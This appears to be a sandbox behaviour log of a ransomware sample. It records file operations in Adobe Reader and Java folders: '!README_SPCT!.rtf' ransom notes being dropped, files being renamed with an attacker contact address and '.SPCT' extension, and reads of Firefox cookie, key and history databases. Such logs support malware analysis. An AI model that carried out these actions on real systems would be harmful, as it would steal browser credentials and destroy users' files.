| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_ie8.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_hover_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\new_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-72x72-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\js\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_bow.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\bg_pattern_RHP.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\nl-nl\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\plugins\rhp\generic-rhp-app-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\new_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\combine-files.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\logo_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-72x72-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fill-sign.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\cs-cz\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\japanese_over.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\RHP_icons_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen.svg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-right.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-right.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\zh-tw\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fi-fi\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pl-pl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\tr-tr\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\!README_SPCT!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\uk-ua\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Move | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\[RecoveryData1@cock.li].kSShwJtK-0ye6zU2w.SPCT | source_filename = C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster2x.jpg, flags = MOVEFILE_REPLACE_EXISTING |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\OfflineCache\index.sqlite | size = 32768, size_out = 32768 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite | size = 32768, size_out = 32768 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\OfflineCache\index.sqlite | size = 8192, size_out = 8192 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\cookies.sqlite | size = 8192, size_out = 8192 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\key3.db | size = 4096, size_out = 4096 |
|
2 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite | size = 32768, size_out = 32768 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\formhistory.sqlite | size = 8192, size_out = 8192 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\places.sqlite | size = 61440, size_out = 61440 |
|
8 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\places.sqlite | size = 32768, size_out = 32768 |
|
1 | |
| Read | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\places.sqlite | size = 16384, size_out = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\compare_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x-dark.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x-dark.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\protect_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\combine_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\compare_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\optimize_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\redact_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\java-rmi.exe | size = 5512 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\java-rmi.exe | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster2x.jpg | size = 5512 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster2x.jpg | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Document Cloud for Government.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Document Cloud for Government.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster2x.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster2x.jpg | size = 16384 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\java.exe | size = 9608 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\bin\java.exe | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf | size = 8998 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster.jpg | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\edit_pdf_poster.jpg | size = 4096 |
|
1 | |
